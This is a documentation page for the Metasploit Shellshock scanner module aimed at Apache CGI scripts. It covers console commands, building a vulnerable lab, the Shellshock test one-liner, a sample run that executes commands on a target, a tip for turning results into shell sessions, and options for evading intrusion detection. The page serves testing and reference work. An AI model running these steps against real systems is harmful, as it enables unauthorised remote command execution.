Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner - Metasploit


This page contains detailed information about how to use the auxiliary/scanner/http/apache_mod_cgi_bash_env metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
Module: auxiliary/scanner/http/apache_mod_cgi_bash_env
Source code: modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
Disclosure date: 2014-09-24
Last modification time: 2018-11-16 12:18:28 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2014-6271, CVE-2014-6278

This module is also known as Shellshock.

This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf auxiliary(apache_mod_cgi_bash_env) > show options
    ... show and set options ...
msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS ip-range
msf auxiliary(apache_mod_cgi_bash_env) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(apache_mod_cgi_bash_env) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • TARGETURI: Path to CGI script

Knowledge Base


Vulnerable Application


This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

Creating a Vulnerable Environment

To setup an Environment that the scanner can be run against, follow the below steps to install a vulnerable OS and Apache version.

To ensure that you have a vulnerable version of bash:

  1. Install Ubuntu 12.04.5 LTS
  2. Log into console
  3. Confirm the host is vulnerable (see next section)
  4. Also install Apache2 from the apt repository with the following command

    sudo apt-get install apache2
    
  5. Enable cgi-mod in apache with the following command

    sudo ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
    
  6. Restart the apache service with the following command

    sudo service apache2 reload
    
  7. In your favorite text editor create a file (as root) in /usr/lib/cgi-bin called test.sh with the following contents:

    #!/bin/bash
    printf "Content-type: text/html\n\n"
    printf "Test!\n"
    
  8. Set the file to be executable with the following command

    sudo chmod +x /usr/lib/cgi-bin/test.sh
    

To check if a host is vulnerable to the attack

  1. Run (on the host)

    env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
    
  2. The shell will return the below text if the environment is vulnerable

    vulnerable
    bash: BASH_FUNC_x(): line 0: syntax error near unexpected token `)'   
    bash: BASH_FUNC_x(): line 0: `BASH_FUNC_x() () { :;}; echo vulnerable'
    bash: error importing function definition for `BASH_FUNC_x'
    test
    

Verification Steps


  1. Do: run msfconsole
  2. Do: use auxiliary/scanner/http/apache_mod_cgi_bash_env
  3. Do: set RHOSTS [IP]
  4. Do: set TARGETURI [URI]
  5. Do: run

Options


CMD

This is the command that will be run by the scanner. The default setting is /usr/bin/id.

CVE

This is the CVE that will be used to exploit the vulnerability. The default setting is CVE-2014-6271 but valid options are CVE-2014-6271 or CVE-2014-6278.

HEADER

This is the user agent string that is sent when the module is run. The default setting is User-Agent.

METHOD

This is HTTP method used by the module. The default setting is GET.

Scenarios


Ubuntu 12.04.5 LTS on Apache 2.2.22

msf5 > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set RHOSTS 172.16.131.134
RHOSTS => 172.16.131.134
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > set TARGETURI /cgi-bin/test.sh
TARGETURI => /cgi-bin/test.sh
msf5 auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

[+] uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the scanner/http/apache_mod_cgi_bash_env auxiliary module looks in the msfconsole:

msf6 > use auxiliary/scanner/http/apache_mod_cgi_bash_env

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show info

       Name: Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
     Module: auxiliary/scanner/http/apache_mod_cgi_bash_env
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-09-24

Provided by:
  Stephane Chazelas
  wvu <[email protected]>
  lcamtuf

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  CMD        /usr/bin/id      yes       Command to run (absolute paths required)
  CVE        CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
  HEADER     User-Agent       yes       HTTP header to use
  METHOD     GET              yes       HTTP method to use
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI                   yes       Path to CGI script
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  This module scans for the Shellshock vulnerability, a flaw in how 
  the Bash shell handles external environment variables. This module 
  targets CGI scripts in the Apache web server by setting the 
  HTTP_USER_AGENT environment variable to a malicious function 
  definition. PROTIP: Use exploit/multi/handler with a PAYLOAD 
  appropriate to your CMD, set ExitOnSession false, run -j, and then 
  run this module to create sessions on vulnerable hosts. Note that 
  this is not the recommended method for obtaining shells. If you 
  require sessions, please use the apache_mod_cgi_bash_env_exec 
  exploit module instead.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-6271
  https://nvd.nist.gov/vuln/detail/CVE-2014-6278
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://access.redhat.com/articles/1200223
  https://seclists.org/oss-sec/2014/q3/649

Also known as:
  Shellshock

Module Options


This is a complete list of options available in the scanner/http/apache_mod_cgi_bash_env auxiliary module:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show options

Module options (auxiliary/scanner/http/apache_mod_cgi_bash_env):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   CMD        /usr/bin/id      yes       Command to run (absolute paths required)
   CVE        CVE-2014-6271    yes       CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
   HEADER     User-Agent       yes       HTTP header to use
   METHOD     GET              yes       HTTP method to use
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                   yes       Path to CGI script
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the scanner/http/apache_mod_cgi_bash_env auxiliary module:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show advanced

Module advanced options (auxiliary/scanner/http/apache_mod_cgi_bash_env):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the scanner/http/apache_mod_cgi_bash_env module can do:

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the scanner/http/apache_mod_cgi_bash_env auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(scanner/http/apache_mod_cgi_bash_env) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Stephane Chazelas
  • wvu
  • lcamtuf

Version


This page has been produced using Metasploit Framework version 6.1.33-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.